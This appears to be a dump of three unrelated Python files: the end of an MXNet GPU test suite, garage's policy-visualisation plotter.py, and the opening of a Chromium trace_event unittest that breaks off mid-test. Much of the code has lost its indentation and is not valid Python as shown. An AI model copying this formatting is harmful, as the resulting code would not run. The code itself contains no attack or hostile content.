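    idx = np.asarray(indices, dtype=np.int64)
    out = np.take(a, idx, axis=0)             # same result as a[idx]
    assert out.shape == idx.shape + a.shape[1:]
    return out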
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(100, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_offset': (2, 18, 7, 7),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
                                           name='deformable_conv')
# run the consistency check for the num_deformable_group=2 case, matching the pattern above
check_consistency(sym, ctx_list)
@with_seed()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_score = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_score = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
if __name__ == '__main__':
import nose
nose.runmodule()
|
plotter.py
|
"""Visualizes a policy running in an environment, in parallel with training."""
import atexit
from collections import namedtuple
from enum import Enum
from multiprocessing import JoinableQueue, Process
import platform
from threading import Thread
import numpy as np
from garage.sampler.utils import rollout
__all__ = ['Plotter']
class Op(Enum):
"""Messages for the Plotter state machine."""
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
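# Illustrative sketch of the message protocol (mirrors how init_plot and
# update_plot below construct messages; env, policy and max_length are
# placeholders supplied by the caller):
#   Message(op=Op.UPDATE, args=(env, policy), kwargs=None)
#   Message(op=Op.DEMO, args=(policy.get_param_values(), max_length), kwargs=None)
#   Message(op=Op.STOP, args=None, kwargs=None)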
class Plotter:
"""Visualizes a policy in an environment."""
# Static variable used to disable the plotter
enable = True
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self):
Plotter.__plotters.append(self)
self._process = None
self._queue = None
def _worker_start(self):
env = None
policy = None
max_length = None
initial_rollout = True
try:
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self._queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
break
if Op.UPDATE in msgs:
env, policy = msgs[Op.UPDATE].args
elif Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
policy.set_param_values(param_values)
initial_rollout = False
rollout(env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
else:
if max_length:
rollout(env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
"""Stop the plotter."""
if not Plotter.enable:
return
if self._process and self._process.is_alive():
while not self._queue.empty():
self._queue.get()
self._queue.task_done()
self._queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self._queue.close()
self._process.join()
@staticmethod
def disable():
"""Disable all instances of the Plotter class."""
Plotter.enable = False
@staticmethod
def _get_plotters():
"""Get all instances of Plotter.
Returns:
List[Plotter]: All instances of Plotter.
"""
return Plotter.__plotters
def _init_worker(self):
if not Plotter.enable:
return
self._queue = JoinableQueue()
if 'Darwin' in platform.platform():
self._process = Thread(target=self._worker_start)
else:
self._process = Process(target=self._worker_start)
self._process.daemon = True
self._process.start()
atexit.register(self.close)
def init_plot(self, env, policy):
"""Initialize the plotter.
Args:
env (GarageEnv): Environment to visualize.
policy (garage.np.policies.Policy): Policy to roll out in the
visualization.
"""
if not Plotter.enable:
return
if not (self._process and self._queue):
self._init_worker()
# Needed in order to draw glfw window on the main thread
if 'Darwin' in platform.platform():
rollout(env,
policy,
max_path_length=np.inf,
animated=True,
speedup=5)
self._queue.put(Message(op=Op.UPDATE, args=(env, policy), kwargs=None))
def update_plot(self, policy, max_length=np.inf):
"""Update the plotter.
Args:
policy (garage.np.policies.Policy): New policy to roll out in the
visualization.
max_length (int): Maximum number of steps to roll out.
"""
if not Plotter.enable:
return
self._queue.put(
Message(op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
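# Minimal usage sketch (not part of the original module; env and policy are
# assumed to be garage environment/policy objects supplied by the caller):
#   plotter = Plotter()
#   plotter.init_plot(env, policy)
#   plotter.update_plot(policy, max_length=500)
#   plotter.close()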
|
trace_event_unittest.py
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import contextlib
import json
import logging
import math
import multiprocessing
import os
import time
import unittest
import sys
from py_trace_event import trace_event
from py_trace_event import trace_time
from py_trace_event.trace_event_impl import log
from py_trace_event.trace_event_impl import multiprocessing_shim
from py_utils import tempfile_ext
class TraceEventTests(unittest.TestCase):
@contextlib.contextmanager
def _test_trace(self, disable=True, format=None):
with tempfile_ext.TemporaryFileName() as filename:
self._log_path = filename
try:
trace_event.trace_enable(self._log_path, format=format)
yield
finally:
if disable:
trace_event.trace_disable()
def testNoImpl(self):
orig_impl = trace_event.trace_event_impl
try:
trace_event.trace_event_impl = None
self.assertFalse(trace_event.trace_can_enable())
finally:
trace_event.trace_event_impl = orig_impl
def testImpl(self):
self.assertTrue(trace_event.trace_can_enable())
def testIsEnabledFalse(self):
self.assertFalse(trace_event.trace_is_enabled())
def testIsEnabledTrue(self):
with self._test_trace():
self.assertTrue(trace_event.trace_is_enabled())
def testEnable(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 1)
self.assertTrue(trace_event.trace_is_enabled())
log_output = log_output.pop()
self.assertEquals(log_output['category'], 'process_argv')
self.assertEquals(log_output['name'], 'process_argv')
self.assertTrue(log_output['args']['argv'])
self.assertEquals(log_output['ph'], 'M')
def testDoubleEnable(self):
try:
with self._test_trace():
with self._test_trace():
pass
except log.TraceException:
return
assert False
def testDisable(self):
_old_multiprocessing_process = multiprocessing.Process
with self._test_trace(disable=False):
with open(self._log_path, 'r') as f:
self.assertTrue(trace_event.trace_is_enabled())
self.assertEqual(
multiprocessing.Process, multiprocessing_shim.ProcessShim)
trace_event.trace_disable()
self.assertEqual(
multiprocessing.Process, _old_multiprocessing_process)
self.assertEquals(len(json.loads(f.read() + ']')), 1)
self.assertFalse(trace_event.trace_is_enabled())
def testDoubleDisable(self):
with self._test_trace():
pass
trace_event.trace_disable()
def testFlushChanges(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('1')
self.assertEquals(len(json.loads(f.read() + ']')), 1)
f.seek(0)
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 2)
def testFlushNoChanges(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
self.assertEquals(len(json.loads(f.read() + ']')),1)
f.seek(0)
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 1)
def testDoubleFlush(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('1')
self.assertEquals(len(json.loads(f.read() + ']')), 1)
f.seek(0)
trace_event.trace_flush()
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 2)
def testTraceBegin(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.trace_begin('test_event', this='that')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue( current_entry['args']['argv'])
self.assertEquals( current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
def testTraceEnd(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.trace_end('test_event')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testTrace(self):
with self._test_trace():
with trace_event.trace('test_event', this='that'):
pass
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testTracedDecorator(self):
@trace_event.traced("this")
def test_decorator(this="that"):
pass
with self._test_trace():
test_decorator()
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
expected_name = __name__ + '.test_decorator'
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
